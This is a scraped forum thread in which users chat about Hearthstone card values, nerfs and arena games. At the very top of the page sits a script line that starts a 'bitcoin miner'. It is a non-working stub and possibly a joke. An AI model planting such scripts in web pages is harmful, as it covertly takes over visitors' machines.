<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmbx communitypge project

Hearthstone General - Welcome to open beta

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
User avatar
Mata Hari
Posts: 2329
Joined: 10 years ago

Re: Hearthstone General - Goblins vs V-07-TR-0N

Postby Mata Hari » 5 years ago

JE SUIS JARAXXUS!!

User avatar
Argumentable
the biggest shit
Posts: 535
Joined: 11 years ago
Location: Twitter
Contact:

Re: Hearthstone General - Goblins vs V-07-TR-0N

Postby Argumentable » 5 years ago

dr_kraid wrote:Lmao if you spend real money
Only if you're a jobless loser

User avatar
Clamestarebla
Clamkind Arch-Highlord
Posts: 233
Joined: 6 years ago
Location: The Void
Contact:

Re: Hearthstone General - Goblins vs V-07-TR-0N

Postby Clamestarebla » 5 years ago

raocow wrote:oh man

So when I play I play it in french because that's the game started for me and that's how I'm used to things... so it's funny when I see photos like this, everything looks kinda 'off'.
Vade Retro Satanas
Train harder, run faster, be stronger, better, evolution never over.
Image
Image
Image
Image

User avatar
Mata Hari
Posts: 2329
Joined: 10 years ago

Re: Hearthstone General - Goblins vs V-07-TR-0N

Postby Mata Hari » 5 years ago

Argumentable wrote:Only if you're a jobless loser
Lmfao if you're wilfully complicit in your own exploitation

Bwarch
Local Candy Fiend
Posts: 143
Joined: 10 years ago
Pronouns: He/Him/His
Location: Scorpions and snakes aplenty oh my.

Re: Hearthstone General - Goblins vs V-07-TR-0N

Postby Bwarch » 5 years ago

raocow wrote:oh man

So when I play I play it in french because that's the game started for me and that's how I'm used to things... so it's funny when I see photos like this, everything looks kinda 'off'.

I should maybe record a fight or two of the tournament from my side just to freak people out with the french version.
I would love to see videos from you on the tourney.

User avatar
zmonbobbo
Haustone Tournament Semifinalist
Hey there! I'm a dude!
Posts: 234
Joined: 11 years ago
First name: Zach
Pronouns: he/him/his
Location: Loosianer

Re: Hearthstone General - Goblins vs V-07-TR-0N

Postby zmonbobbo » 5 years ago

raocow wrote:oh man

So when I play I play it in french because that's the game started for me and that's how I'm used to things... so it's funny when I see photos like this, everything looks kinda 'off'.

I should maybe record a fight or two of the tournament from my side just to freak people out with the french version.
I smell the best b-side ever

I'm getting annoyed because I drew Neptulon from a random arena pack the other day and I desperately want to make it work. It just... doesn't.
I'm probably driving right now.
Image
Image
Image
Image

Bwarch
Local Candy Fiend
Posts: 143
Joined: 10 years ago
Pronouns: He/Him/His
Location: Scorpions and snakes aplenty oh my.

Re: Hearthstone General - Goblins vs V-07-TR-0N

Postby Bwarch » 5 years ago

zmonbobbo wrote:
raocow wrote:oh man

So when I play I play it in french because that's the game started for me and that's how I'm used to things... so it's funny when I see photos like this, everything looks kinda 'off'.

I should maybe record a fight or two of the tournament from my side just to freak people out with the french version.
I smell the best b-side ever

I'm getting annoyed because I drew Neptulon from a random arena pack the other day and I desperately want to make it work. It just... doesn't.
Disenchant it mang, it ain't worth the trouble lol. Get a good epic or some rares.

User avatar
Ditocoaf
Haustone Tournament Finalist
Posts: 559
Joined: 8 years ago
Pronouns: he/him/his
Location: On the horizon of the brandscape

Re: Hearthstone General - Goblins vs V-07-TR-0N

Postby Ditocoaf » 5 years ago

Nah, I wouldn't craft Neptulon but I wouldn't disenchant him either. He's not amazing in any decks right now, but he's pretty solid and I totally expect him to be useful at some point. More akin to Harrison Jones (feels useless for months at a time, but sometimes feels absolutely neccesary) than The Beast (nobody has ever found it to be worth the mana and nobody ever will).

The secret is that he doesn't have to be used in a Murloc deck -- any "synergy" murloc cards you draw off him can be used fine with each other. He's just a big drop that gives you a "play a handful of murlocs" option to use sometime during the next few turns. He's a trick to avoid "running out of steam", if you ever have that problem.

(Of course, any disenchanting advice depends heavily on what sort of collection you have. If you can't put together a single good deck yet, then the "is it worth disenchanting" bar gets a lot lower.)

User avatar
Animita
Posts: 62
Joined: 6 years ago
Pronouns: Him/Her

Re: Hearthstone General - Goblins vs V-07-TR-0N

Postby Animita » 5 years ago

Feel like posting a story from an arena run I had a while back.

So here I am fighting a Druid and stomping face with fel reaver. Had some otherthings on the board but fel reaver is carrying. They play piloted sky golem so I'm like"k" and kill it. Suddenly I'm playing gurran laggan the card game and piloted shredder was piloting the golem. So I killed that too. And then pops out patient assassin. Which then kills fel reaver on thier turn and costed me the game. I was beyond pissed.
Image

Bwarch
Local Candy Fiend
Posts: 143
Joined: 10 years ago
Pronouns: He/Him/His
Location: Scorpions and snakes aplenty oh my.

Re: Hearthstone General - Goblins vs V-07-TR-0N

Postby Bwarch » 5 years ago

Ditocoaf wrote:Nah, I wouldn't craft Neptulon but I wouldn't disenchant him either. He's not amazing in any decks right now, but he's pretty solid and I totally expect him to be useful at some point. More akin to Harrison Jones (feels useless for months at a time, but sometimes feels absolutely neccesary) than The Beast (nobody has ever found it to be worth the mana and nobody ever will).

The secret is that he doesn't have to be used in a Murloc deck -- any "synergy" murloc cards you draw off him can be used fine with each other. He's just a big drop that gives you a "play a handful of murlocs" option to use sometime during the next few turns. He's a trick to avoid "running out of steam", if you ever have that problem.

(Of course, any disenchanting advice depends heavily on what sort of collection you have. If you can't put together a single good deck yet, then the "is it worth disenchanting" bar gets a lot lower.)
With BGH seeing so much play because of Dr. Boom Neptulon is useless, if in fact your opponent is keeping up on the meta (Which they are more often than not)

Once Dr. Boom gets nerfed (I'm kinda expecting it? I mean, when every deck ever is running him if they have him you'd think they'd know "Oh crap we made that just a tad too good)) then maybe he could see some play when BGH isn't being run anymore as an absolute must include.
Animita wrote:Feel like posting a story from an arena run I had a while back.

So here I am fighting a Druid and stomping face with fel reaver. Had some otherthings on the board but fel reaver is carrying. They play piloted sky golem so I'm like"k" and kill it. Suddenly I'm playing gurran laggan the card game and piloted shredder was piloting the golem. So I killed that too. And then pops out patient assassin. Which then kills fel reaver on thier turn and costed me the game. I was beyond pissed.
I'm glad that somebody had the russian doll effect happen! It was so fun to imagine a pilot popping out of a pilot.

User avatar
Mata Hari
Posts: 2329
Joined: 10 years ago

Re: Hearthstone General - Goblins vs V-07-TR-0N

Postby Mata Hari » 5 years ago

In a stunning piece of Morissettesque irony, Undertaker is dead. RIP in peperony.

actually I reckon it might still be playable but w/e

User avatar
Jesuiscontent
Tsundere
Posts: 864
Joined: 8 years ago
First name: cool old field
Location: France

Re: Hearthstone General - Goblins vs V-07-TR-0N

Postby Jesuiscontent » 5 years ago

good riddance
Image

Image
Image

User avatar
Ditocoaf
Haustone Tournament Finalist
Posts: 559
Joined: 8 years ago
Pronouns: he/him/his
Location: On the horizon of the brandscape

Re: Hearthstone General - Goblins vs V-07-TR-0N

Postby Ditocoaf » 5 years ago

Sweet.

Last week I made a dumb deck that "includes everything I think is OP", with both Dr boom, Undertaker, and Mechwarper, and a bunch of deathrattle mechs to activate both UT and Mechwarper, plus Mad Scientist because I honestly think he's too good (and he activates UT), plus Unstable Portal because it can just straight-up win you the game one in three times you play it. In fact, all of those cards can occasionally just straight-up win you the game. The deck was entirely unfocused, so I was entirely dependent on that effect. "Which of my five OP cards will win me this game?" I would ask myself. Sometimes a perfectly timed Dr. Boom would save me, sometimes I'd get the perfect deathrattle opening, sometimes I'd get the perfect mechwarper opening, sometimes I'd get a 6-drop off of mad scientist's mirror entity, sometimes NONE of that would happen but Unstable Portal would give me Grommash Hellscream and I'd win.

That deck, with absolutely no real planning, ended up doing absurdly well. Which proved my point, I guess. Anyway, that means Dr. Boom is next on the chopping block, I hope.

User avatar
Argumentable
the biggest shit
Posts: 535
Joined: 11 years ago
Location: Twitter
Contact:

Re: Hearthstone General - Goblins vs V-07-TR-0N

Postby Argumentable » 5 years ago

Undertaker was fine. It could spiral out of control and I don't really care one way or the other about the change. Aggro decks will (probably) still use him and just not be able to cement board control. For a while all my decks were just death rattle decks. Yeah, for a while Undertaker was the best card I had and deathrattle was the only archetype I felt I was good at playing. That sort of stopped with me, so I stopped caring about undertaker. Now all my decks are ragnaros and ysera

User avatar
Clamestarebla
Clamkind Arch-Highlord
Posts: 233
Joined: 6 years ago
Location: The Void
Contact:

Re: Hearthstone General - Goblins vs V-07-TR-0N

Postby Clamestarebla » 5 years ago

Pfft, you and your silly useful legendaries. Everyone knows Nozdormu is the best one by far.
Train harder, run faster, be stronger, better, evolution never over.
Image
Image
Image
Image

User avatar
Argumentable
the biggest shit
Posts: 535
Joined: 11 years ago
Location: Twitter
Contact:

Re: Hearthstone General - Goblins vs V-07-TR-0N

Postby Argumentable » 5 years ago

Yeah my legendaries are pretty limited and my GVG ones are awful. I actually really wanna use my dust to craft a bunch (or even more epics) but I am not because ????

I'm the kind of guy that will want every card eventually though

User avatar
Jesuiscontent
Tsundere
Posts: 864
Joined: 8 years ago
First name: cool old field
Location: France

Re: Hearthstone General - Goblins vs V-07-TR-0N

Postby Jesuiscontent » 5 years ago

There's just something satisfying about 500000 dust sitting in storage
Image

Image
Image

User avatar
Mata Hari
Posts: 2329
Joined: 10 years ago

Re: Hearthstone General - Goblins vs V-07-TR-0N

Postby Mata Hari » 5 years ago

I don't spend real money and I don't play Arena so I have like zero dust at all times.

One time I saved up my dust like a good girl and I couldn't decide whether to craft Black Knight or Sylvanas. I chose TBK because my favourite class is drood. Guess who my next pull was??

Still want my Sylvanas maine

User avatar
Mata Hari
Posts: 2329
Joined: 10 years ago

Re: Hearthstone General - Goblins vs V-07-TR-0N

Postby Mata Hari » 5 years ago

And before you say Druid often runs Sylvanas a. this was before Sylvanas in Druid became more common and b. I run combo Druid over ramp Druid, I don't even run Wild Growth

User avatar
Clamestarebla
Clamkind Arch-Highlord
Posts: 233
Joined: 6 years ago
Location: The Void
Contact:

Re: Hearthstone General - Goblins vs V-07-TR-0N

Postby Clamestarebla » 5 years ago

Rarest cards I got are Shield Slam and Ice Block. And guess what 2 classes I never use.
Train harder, run faster, be stronger, better, evolution never over.
Image
Image
Image
Image

User avatar
Argumentable
the biggest shit
Posts: 535
Joined: 11 years ago
Location: Twitter
Contact:

Re: Hearthstone General - Goblins vs V-07-TR-0N

Postby Argumentable » 5 years ago

Cool
Hearthstone_Screenshot_1.31.2015.12.36.34 (840 x 502).png
Hearthstone_Screenshot_1.31.2015.12.36.34 (840 x 502).png (491.08 KiB) Viewed 1942 times

User avatar
Clamestarebla
Clamkind Arch-Highlord
Posts: 233
Joined: 6 years ago
Location: The Void
Contact:

Re: Hearthstone General - Goblins vs V-07-TR-0N

Postby Clamestarebla » 5 years ago

no idea what you are talking about
Image
Train harder, run faster, be stronger, better, evolution never over.
Image
Image
Image
Image

User avatar
Ditocoaf
Haustone Tournament Finalist
Posts: 559
Joined: 8 years ago
Pronouns: he/him/his
Location: On the horizon of the brandscape

Re: Hearthstone General - Goblins vs V-07-TR-0N

Postby Ditocoaf » 5 years ago

Hah, that happened to me yesterday too.

User avatar
Rednaxela
Maker of Shenanigans
Posts: 792
Joined: 6 years ago

Re: Hearthstone General - Goblins vs V-07-TR-0N

Postby Rednaxela » 5 years ago

Ugh, that visual bug happened to me earlier today too.

User avatar
Clamestarebla
Clamkind Arch-Highlord
Posts: 233
Joined: 6 years ago
Location: The Void
Contact:

Re: Hearthstone General - Goblins vs V-07-TR-0N

Postby Clamestarebla » 5 years ago

Image
If only I had lived one more turn, the irony would've been splendid.
Train harder, run faster, be stronger, better, evolution never over.
Image
Image
Image
Image


Return to “the cartridgé”

Who is online

Users browsing this forum: No registered users and 4 guests